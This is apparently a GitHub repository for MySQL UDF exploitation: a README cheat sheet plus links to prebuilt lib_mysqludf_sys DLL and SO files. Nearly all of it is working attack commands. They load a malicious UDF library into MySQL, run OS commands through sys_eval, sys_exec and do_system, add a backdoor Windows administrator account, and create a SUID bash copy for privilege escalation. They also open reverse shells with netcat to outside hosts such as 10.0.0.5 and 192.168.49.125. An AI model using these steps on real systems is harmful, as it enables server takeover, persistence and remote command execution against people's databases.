├── README.md ├── lib_mysqludf_sys_32.dll ├── lib_mysqludf_sys_32.so ├── lib_mysqludf_sys_64.dll └── lib_mysqludf_sys_64.so /README.md: -------------------------------------------------------------------------------- 1 | # MySQL UDF Exploitation Simple Cheat Sheet 2 | 3 | There is a TR blog post for this [`MySQL UDF Exploitations`](https://bariskoparmal.com/2022/02/09/sql-injection-to-different-attack-vectors/) methodology. 4 | 5 | ## *Setup for Windows* 6 | 7 | ```bash 8 | select @@version_compile_os, @@version_compile_machine; 9 | ``` 10 | ```bash 11 | select @@plugin_dir; 12 | ``` 13 | ```bash 14 | select load_file('\\\\10.0.0.5\\share\\lib_mysqludf_sys_64.dll') into dumpfile "\\udf.dll"; 15 | ``` 16 | ```bash 17 | create function sys_bineval returns int soname 'udf.dll'; 18 | ``` 19 | ```bash 20 | create function sys_eval returns string soname 'udf.dll'; 21 | ``` 22 | ```bash 23 | select * from mysql.func where name = 'sys_bineval'; 24 | ``` 25 | ```bash 26 | select * from mysql.func where name = 'sys_eval'; 27 | ``` 28 | 29 | ## *Execute Commands Samples for Windows* 30 | 31 | ```bash 32 | select sys_eval('dir C:\\Users\\4rch\\Desktop\\'); 33 | ``` 34 | ```bash 35 | select sys_exec("net user 4rchantos Passwd1 /add"); 36 | ``` 37 | ```bash 38 | select sys_exec("net localgroup Administrators 4rchantos /add"); 39 | ``` 40 | ```bash 41 | select sys_eval("net use X: \\\\10.0.0.5\\share /user:user passwd"); 42 | ``` 43 | ```bash 44 | select sys_eval("C:\\Users\\4rch\\Desktop\\nc.exe -e cmd.exe 192.168.49.125 80"); 45 | ``` 46 | 47 | 48 | ## *Setup for Linux* 49 | 50 | ```bash 51 | select @@version_compile_os, @@version_compile_machine; 52 | ``` 53 | ```bash 54 | show variables like '%plugin%'; 55 | ``` 56 | ```bash 57 | use mysql; 58 | ``` 59 | ```bash 60 | create table foo(line blob); 61 | ``` 62 | ```bash 63 | insert into foo values(load_file('/tmp/lib_mysqludf_sys_64.so')); 64 | ``` 65 | ```bash 66 | select * from foo into dumpfile '/raptor_udf.so'; 67 | ``` 68 | ```bash 69 | create function do_system returns integer soname 'raptor_udf.so'; 70 | ``` 71 | ```bash 72 | select * from mysql.func; 73 | ``` 74 | ```bash 75 | select do_system(''); 76 | ``` 77 | 78 | ## *Execute Privilege Escalation Commands Samples for Linux* 79 | ```bash 80 | select do_system('cp /bin/bash /tmp/4rch; chmod +xs /tmp/4rch'); 81 | ``` 82 | ```bash 83 | /tmp/4rch -p 84 | ``` 85 | ```bash 86 | select do_system('id > /tmp/out; chown raptor.raptor /tmp/out'); 87 | ``` 88 | ```bash 89 | \! sh 90 | ``` 91 | 92 | ## *Execute Command Samples for Linux* 93 | ```bash 94 | select do_system('id > /var/www/output; chown www-data www-data /var/www/output'); 95 | ``` 96 | ```bash 97 | select do_system('nc 10.0.0.5 1337 -e /bin/bash'); 98 | ``` 99 | 100 | -------------------------------------------------------------------------------- /lib_mysqludf_sys_32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/koparmalbaris/MySQL-UDF-Exploitation/39bf4a6c90f017dffd9fb9259da3978c9d315907/lib_mysqludf_sys_32.dll -------------------------------------------------------------------------------- /lib_mysqludf_sys_32.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/koparmalbaris/MySQL-UDF-Exploitation/39bf4a6c90f017dffd9fb9259da3978c9d315907/lib_mysqludf_sys_32.so -------------------------------------------------------------------------------- /lib_mysqludf_sys_64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/koparmalbaris/MySQL-UDF-Exploitation/39bf4a6c90f017dffd9fb9259da3978c9d315907/lib_mysqludf_sys_64.dll -------------------------------------------------------------------------------- /lib_mysqludf_sys_64.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/koparmalbaris/MySQL-UDF-Exploitation/39bf4a6c90f017dffd9fb9259da3978c9d315907/lib_mysqludf_sys_64.so --------------------------------------------------------------------------------